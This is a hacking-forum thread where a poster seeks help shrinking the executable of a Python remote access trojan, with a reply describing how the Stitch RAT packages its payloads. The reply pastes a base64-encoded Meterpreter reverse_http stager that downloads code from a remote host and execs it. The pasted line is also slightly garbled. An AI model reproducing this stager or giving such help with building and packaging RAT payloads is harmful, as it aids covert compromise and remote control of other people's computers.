Forum Thread: How to Create a Small and Compressed Executable from Python Payload?

Hey folks!

I'm currently done writing a RAT in python. It comes with a lot of features, such as encryption, C extensions (ctypes), huge image libraries and more. If I convert it to an executable using Py2Exe or PyInstaller, the resulting EXE will have a size of 12 - 15 MB, which is obviously inappropriate.

I thought that there is no way of getting around that huge file size until I saw another RAT written in Python called Stitch. The Stitch payload has even more imports than my payload has and the generated binary's file size is 5 - 6 MB.

Now I'm wondering how that executable can be so small. After looking at the Stitch source code, I found out that they are using Py2Exe as well. That confused me a lot.

Maybe there is somebody that knows how to handle this problem. Thank you for taking the time to read it to the end!

~chrizator

Get The Null Byte Newsletter

Never miss a new hacking or security guide

1 Response

I am trying to make a rat generator right now, and i am not very good, but looking at stitch i notice a few things. I notice:

sticth has .py, and .pyc files -- byte compiled python files
sticth has makeself.sh in tools/makeself which creates a .tar archive
sticth has a variety of things that are zipped and base64 encoded, probably to downsize.
It appears to have quite a bit of user configuration, so lighter payloads == less imports
its very nicely organized.

I dont know if these affect too much, as i am currently creating the script that generates the payloads.

take meterpreter for example this is its python file for reverse http :

import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}sys.version_info[0('aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJ10pCmhzPVtdCm89dWwuYnVpbGRfb3BlbmVyKCpocykKby5hZGRoZWFkZXJzPVsoJ1VzZXItQWdlbnQnLCdNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJyldCmV4ZWMoby5vcGVuKCdodHRwOi8vMTkyLjE2OC4wLjE6ODA4MC9QRXZQYzJBemExckJBZFFWbTBtUTJBTVFKRmNlMXd2MXRqQjk5NUp1OUJObVktdUlVRUZrZ18xZm9uV0FaQy0tSDZsUmQta1lfTTJiZko5TlRNd1FzbUp3ZVdiVXBIbjhHWjFRSWFsVEtjNUJNS1puY1N1bVltMk51XzVpVGJ1eWhsNEtKY3dUS3NZS1cyc2JKdFFWbVlOeURnM1hYdFRwYWpIQmpvZEQ5ZHNFb2NtUnFQc2xKdGxWQ1B5UWF5R3NseGFQVl9KMFlteV9VczZabHpBWFRPSlYwbFBEN0RxY19vNGNaOScpLnJlYWQoKSkK')))

Thats one line which becomes a string that imports http server, urllib stuff like that that is used in the meterpeter. Meterpreters size is 786bytes....look at what a meterpreter can do.

Share Your Thoughts

  • Hot
  • Active